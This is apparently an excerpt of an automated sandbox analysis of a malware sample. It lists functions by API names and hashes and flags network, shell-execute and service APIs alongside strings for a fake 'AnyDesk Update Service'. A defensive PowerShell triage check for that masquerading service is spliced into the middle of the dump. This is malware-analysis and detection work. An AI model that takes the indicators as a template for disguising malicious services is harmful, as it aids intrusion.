                                                                                                      • Instruction Fuzzy Hash: 7011D051E2F103A5FA947FB298162FD1DA14F50343F800430E7CEC62C3EE2CBA8146A2
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EnvironmentStrings$Free
                                                                                                      • String ID:
                                                                                                      • API String ID: 3328510275-0
                                                                                                      • Opcode ID: 0569d1ce216643eab5a4f3de0e57884fb0549fe14321f9cc615d00747ef2c50b
                                                                                                      • Instruction ID: ab8548da86cf6ce796ff99fc2ba2fa4b2d80b06af35a6ec71dee67199d6fe7e7
                                                                                                      • Opcode Fuzzy Hash: 0569d1ce216643eab5a4f3de0e57884fb0549fe14321f9cc615d00747ef2c50b
                                                                                                      • Instruction Fuzzy Hash: 7101C812F0B75281EA209F1574100296B60EF54FE1F5C4235DFEE537CADE6CE4428340
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseErrorHandleLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 918212764-0
                                                                                                      • Opcode ID: 90f3701c9648459cb02c6a100222a657127510a50ce0718e7ba9b00f7c694d7d
                                                                                                      • Instruction ID: ee7b2eeb089b5b864adae189946ef55c09126606c23b4ed3feb2298231836f48
                                                                                                      • Opcode Fuzzy Hash: 90f3701c9648459cb02c6a100222a657127510a50ce0718e7ba9b00f7c694d7d
                                                                                                      • Instruction Fuzzy Hash: 2821A111F0E68241FF909F61A49427D1ED5AF85BA6F494235EBAFC73D5DE6CA4408300
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 963392458-0
                                                                                                      • Opcode ID: 66c358961b55405a7c2c8e21c583bcf1218276d2d0741f30b0a745b2ca595dfc
                                                                                                      • Instruction ID: 4b23c002a3218172db4174593b6a53be96ea36f36faa04f36c2aea544d04ad7a
                                                                                                      • Opcode Fuzzy Hash: 66c358961b55405a7c2c8e21c583bcf1218276d2d0741f30b0a745b2ca595dfc
                                                                                                      • Instruction Fuzzy Hash: BF818036B097C18AE7608F65E4800AE7FA4F784B99F144136EFD857BA9DF38D4858700
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                      • String ID:
                                                                                                      • API String ID: 3947729631-0
                                                                                                      • Opcode ID: cd5b1ec9326ab752cbab8a506842d599e38701f1fb06bfee859337e6559e84a7
                                                                                                      • Instruction ID: 02058e954a1f6aec4b09f54f34e50f1804f6afab3ebdd7b0c42a83f36acad948
                                                                                                      • Opcode Fuzzy Hash: cd5b1ec9326ab752cbab8a506842d599e38701f1fb06bfee859337e6559e84a7
                                                                                                      • Instruction Fuzzy Hash: EE219F32A16B0599EB248F64D4822EC3BA0FB05719F040636D79D87BD5DF38E645C754
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 3215553584-0
                                                                                                      • Opcode ID: d828b0d5652c2d04ac676ba8046156f360f4c386c5efaa2d7327842d9c67eb8d
                                                                                                      • Instruction ID: 75912682b8eabb102446c1c9a79c66c993c3f5a6ca3e00d5722bbf1a55ce03b3
                                                                                                      • Opcode Fuzzy Hash: d828b0d5652c2d04ac676ba8046156f360f4c386c5efaa2d7327842d9c67eb8d
                                                                                                      • Instruction Fuzzy Hash: FB21C632A09B4287DB61CF18D4403797AA1FB84B55F544235E7AEC76D9DF3CD8018B00
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 3215553584-0
                                                                                                      • Opcode ID: a17d875b9342dfe3ed9dbf28369d4997790f73aba12d6fa00d5f6f8d2ccfcf94
                                                                                                      • Instruction ID: 7a93e76170cbacb7a28c2215b1feb777f0e9d58296821fbc4e14f020c5c99532
                                                                                                      • Opcode Fuzzy Hash: a17d875b9342dfe3ed9dbf28369d4997790f73aba12d6fa00d5f6f8d2ccfcf94
                                                                                                      • Instruction Fuzzy Hash: 58117C22B1E68182FF619F51D40037AAA90AF85B81F544535FBCECBAC6DE6CEA008740
                                                                                                      APIs
                                                                                                      • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF6C7867D04
                                                                                                        • Part of subcall function 00007FF6C78698F0: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF6C78698F8
                                                                                                        • Part of subcall function 00007FF6C78698F0: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF6C78698FD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      Similarity
                                                                                                      • API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
                                                                                                      • String ID:
                                                                                                      • API String ID: 1208906642-0
                                                                                                      • Opcode ID: 618b27d6aae39a8f871c17403ea0f75d10ea49eca7122d85f07bb336888fced9
                                                                                                      • Instruction ID: 667ff7f425e63be3a27244c2e8b78f3a2e99c2e793db579727c9b485b7411455
                                                                                                      • Opcode Fuzzy Hash: 618b27d6aae39a8f871c17403ea0f75d10ea49eca7122d85f07bb336888fced9
                                                                                                      • Instruction Fuzzy Hash: 84E0B650D6F243A4FE553F3515463B80E405F21347E502879DBEEC21CBDE0E234625A2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      Similarity
                                                                                                      • API ID: File$Internet$CloseHandle$std::_$AttributesLockitObjectSingleWait$ErrorExecuteLastShell$Lockit::_Lockit::~_OpenRead_invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskCreateFacet_MoveRegisterSleepWrite
                                                                                                      • String ID: #*1*$4h>h$7h*h$;*V*$@$Qh7h$R*=*$XhYh$kh(h$p
                                                                                                      • API String ID: 3970674913-2482468732
                                                                                                      • Opcode ID: 077562850e548e5ee04dcf2a8a59179b575a7ea7ddc821b45c83099a5fb45278
                                                                                                      • Instruction ID: f61cd41803f750f0dae6ae02fc5508b62b519ca1592e5acb99ccc0e562c0cc67
                                                                                                      • Opcode Fuzzy Hash: 077562850e548e5ee04dcf2a8a59179b575a7ea7ddc821b45c83099a5fb45278
                                                                                                      • Instruction Fuzzy Hash: D7832A2691A2C299E330AF71D8413F93760FF6870AF405036E788CBAA9EF3D5645D719
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      Similarity
                                                                                                      • API ID: Service_invalid_parameter_noinfo_noreturn$ErrorLastStatus$CloseCreateHandle$CtrlEventFileHandlerManagerModuleNameOpenRegisterThread
                                                                                                      • String ID: %s$%s (%d)$%s (%d)$%s (%d)$AnyDesk Update Service$AnyDeskUpdateService$AnyDeskUpdateService$pslk
                                                                                                      • API String ID: 2335625088-53298800
                                                                                                      • Opcode ID: 00848399103b6d949bbf2ad8a78e9ae82022c4cbc5f55f62c2c1f851970f7318
                                                                                                      • Instruction ID: 21e0ed18f6b58ce876b982654bbd16cc4bc757597f8c22ff2b57b806755dd754
                                                                                                      • Opcode Fuzzy Hash: 00848399103b6d949bbf2ad8a78e9ae82022c4cbc5f55f62c2c1f851970f7318
                                                                                                      • Instruction Fuzzy Hash: 7862C222E196828AF700CF78E4042AD3BA1FF59799F505236EB9996AA5EF3CD145C700
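The function above pairs a service-control API set (the API ID names Service, Register, CtrlHandler, Manager, Open, Create, Close and Thread calls next to GetLastError, GetModuleFileName and CreateFile) with the strings "AnyDesk Update Service" and "AnyDeskUpdateService", so the sample carries both the display name and the internal name of a service that presents itself as an AnyDesk updater. The listing shows only that one function references these names together with service APIs; it does not by itself establish whether the service is created, opened, queried or stopped. The PowerShell below is an added host triage check, not part of the Joe Sandbox report and not AnyDesk code: it looks for a service by either name and records where its binary lives and who signed it. The two names are taken from the strings above; the trusted install roots and the publisher pattern are assumptions to confirm against a known-good AnyDesk install (the name under which a stock AnyDesk install registers its own service is also assumed to differ and should be checked the same way).

```powershell
# Added triage check; not from the Joe Sandbox report and not AnyDesk's own code.
# The service and display names are the strings the report shows in this function.
# Trusted install roots and the publisher pattern are ASSUMPTIONS: confirm them on a
# known-good AnyDesk host before acting on the output.
$SuspectServiceNames = @('AnyDeskUpdateService')
$SuspectDisplayNames = @('AnyDesk Update Service')
$TrustedInstallRoots = @(${env:ProgramFiles}, ${env:ProgramFiles(x86)}) |
    Where-Object { $_ } | ForEach-Object { Join-Path $_ 'AnyDesk' }   # assumption
$TrustedPublisherPattern = '*AnyDesk*'   # assumption: matched against the signer Subject

function Get-ServiceBinaryPath {
    # Reduce an ImagePath such as  "C:\dir\svc.exe" --service  or  C:\dir\svc.exe -k  to the executable.
    param([Parameter(Mandatory)][string]$PathName)
    if ($PathName -match '^\s*"([^"]+)"') { return $Matches[1] }
    return ($PathName.Trim() -split '\s+')[0]
}

function Test-ServiceMasquerade {
    # One record per service whose Name or DisplayName matches the strings from the sample,
    # with the facts a responder needs: binary location, trusted-root membership, Authenticode status.
    $results = foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        if (($SuspectServiceNames -notcontains $svc.Name) -and
            ($SuspectDisplayNames -notcontains $svc.DisplayName)) { continue }

        $bin = if ($svc.PathName) { Get-ServiceBinaryPath -PathName $svc.PathName } else { '' }
        $sig = if ($bin -and (Test-Path -LiteralPath $bin)) { Get-AuthenticodeSignature -FilePath $bin } else { $null }
        $signer = if ($sig -and $sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '' }
        $inTrustedRoot = [bool]($TrustedInstallRoots | Where-Object { $bin -like (Join-Path $_ '*') })
        $sigValid = [bool]($sig -and $sig.Status -eq 'Valid')

        [pscustomobject]@{
            Name            = $svc.Name
            DisplayName     = $svc.DisplayName
            State           = $svc.State
            StartMode       = $svc.StartMode
            Binary          = $bin
            InTrustedRoot   = $inTrustedRoot
            UnderSystemRoot = $bin -like (Join-Path $env:SystemRoot '*')
            SignatureStatus = if ($sig) { $sig.Status.ToString() } else { 'FileMissing' }
            Signer          = $signer
            # A service wearing the vendor's name but running from outside the vendor's directory,
            # or without the vendor's valid signature, is the masquerade pattern worth escalating.
            Suspicious      = -not ($inTrustedRoot -and $sigValid -and ($signer -like $TrustedPublisherPattern))
        }
    }
    return $results
}

Test-ServiceMasquerade | Format-List
```

Run it from an elevated session on the host under investigation; an empty result means no service currently carries either name, which does not exclude that the sample created and later deleted one, so pair it with the process tree and the service-installation events from the same time window.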
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo$fegetenv
                                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                      • API String ID: 1709182501-2761157908
                                                                                                      • Opcode ID: b59e69f4204536450ccd6fa78c03395ee9f6d53d672f6eba5bc1b9b1de87101d
                                                                                                      • Instruction ID: ac59b56aeab79057291616a362656cfe4516c9a94120deb46e2429475410272c
                                                                                                      • Opcode Fuzzy Hash: b59e69f4204536450ccd6fa78c03395ee9f6d53d672f6eba5bc1b9b1de87101d
                                                                                                      • Instruction Fuzzy Hash: 1AB2C472A2A2828BE764CF65D4407FD3BA1FB54389F945136DB5ED7A84DF38A900CB40
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::cancel_current_task$_invalid_parameter_noinfo_noreturn
                                                                                                      • String ID: ios_base::failbit set
                                                                                                      • API String ID: 4131450254-3924258884
                                                                                                      • Opcode ID: d216165668479aeebd92cfd32e0e0fa09fef93c486884d47427c151aa33764a7
                                                                                                      • Instruction ID: cfa7d470c144509ca351d1f668c54d2756436a91095b03ee0f70ce4dc031f2d0
                                                                                                      • Opcode Fuzzy Hash: d216165668479aeebd92cfd32e0e0fa09fef93c486884d47427c151aa33764a7
                                                                                                      • Instruction Fuzzy Hash: 7D62BB22B2AA8696EB118F29D4402AD7BA1FB48F85F548131EF9DD3BA4DF3CD545C300
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastNameTranslate$CodeInfoLocalePageValidValue
                                                                                                      • String ID: utf8
                                                                                                      • API String ID: 3069159798-905460609
                                                                                                      • Opcode ID: 23966cb477daef38ef586ca10e469e6a55aaaa8553c2ec0c99e1010b04e3dac5
                                                                                                      • Instruction ID: 92aae95399ab042b2896f8bdab533841d7f5d427d9c71ac96986994c39e20317
                                                                                                      • Opcode Fuzzy Hash: 23966cb477daef38ef586ca10e469e6a55aaaa8553c2ec0c99e1010b04e3dac5
                                                                                                      • Instruction Fuzzy Hash: AE919C36B0A74286EB249F61D8406B92BA5EF44B82F448132DB9D877CADF3DE951C340
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      Similarity
                                                                                                      • API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 2591520935-0
                                                                                                      • Opcode ID: a02af41d092f35fb43f6f467199965a4c9166f1d5bb537038a4f83c2451e3280
                                                                                                      • Instruction ID: 03e0f7d210a02de0bf3d9ba94d65da3b62d8c7fd8bdf1cc52feae930257cf04e
                                                                                                      • Opcode Fuzzy Hash: a02af41d092f35fb43f6f467199965a4c9166f1d5bb537038a4f83c2451e3280
                                                                                                      • Instruction Fuzzy Hash: D7716822B1A64289FF219FB1D8506BC2BB0BF48B86F444136CB9D97795EF3CA545C350
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 3140674995-0
                                                                                                      • Opcode ID: 5e37717cb04637ae486a186e1833263bf3eb9ee7c24be1d440358644591693ee
                                                                                                      • Instruction ID: 4916dd0bcf32fe4d61ca178bb6a216d91f275527ed0d33508fe4ec6c91d38c4f
                                                                                                      • Opcode Fuzzy Hash: 5e37717cb04637ae486a186e1833263bf3eb9ee7c24be1d440358644591693ee
                                                                                                      • Instruction Fuzzy Hash: B8313D72619B819AEB608F61E8503ED6774FB44705F40443ADB8D87B95EF38D648C710
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 1239891234-0
                                                                                                      • Opcode ID: bae0a4c4c2cad22568b79b792437c816fd46d0f8199cd0bc6f17ff1263d381fd
                                                                                                      • Instruction ID: 8d8d3872ecde1a0491cca07b99644f05774afebeed70d2a705520d13402052b7
                                                                                                      • Opcode Fuzzy Hash: bae0a4c4c2cad22568b79b792437c816fd46d0f8199cd0bc6f17ff1263d381fd
                                                                                                      • Instruction Fuzzy Hash: D1316D32619F8196DB60CF25E8402AE77A4FB89795F500136EBDD83B95EF3CD5458B00
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      Similarity
                                                                                                      • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 2227656907-0
                                                                                                      • Opcode ID: fbba52b1468ed587477220f350bb15cea76bb5262a21c8ee64979a1f66350291
                                                                                                      • Instruction ID: 5e03e42fd204e4162ddeea5d89cc99cf06772d7bc685ca46b88977a44c113be7
                                                                                                      • Opcode Fuzzy Hash: fbba52b1468ed587477220f350bb15cea76bb5262a21c8ee64979a1f66350291
                                                                                                      • Instruction Fuzzy Hash: 37B1B022B1A69241EA61DF26E9041BD6B91EB54BE6F444232EF9EC7F85DF3CE441C300
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                      • String ID: %$+
                                                                                                      • API String ID: 3668304517-2626897407
                                                                                                      • Opcode ID: 0fd9ca557f51245f4f5995841fae7dfbce88245f711088f79452f8c2057a3195
                                                                                                      • Instruction ID: 25438a26ec436e8ef7cf7f32674f718d2ab4149cfd3fe61d465c0314c58d9b04
                                                                                                      • Opcode Fuzzy Hash: 0fd9ca557f51245f4f5995841fae7dfbce88245f711088f79452f8c2057a3195
                                                                                                      • Instruction Fuzzy Hash: 03123262B29A859AFB218F64D4407FD2B62AF54789F044231DF8DDBBC9DE3CD6818304
                                                                                                      APIs
                                                                                                      Memory Dump Source
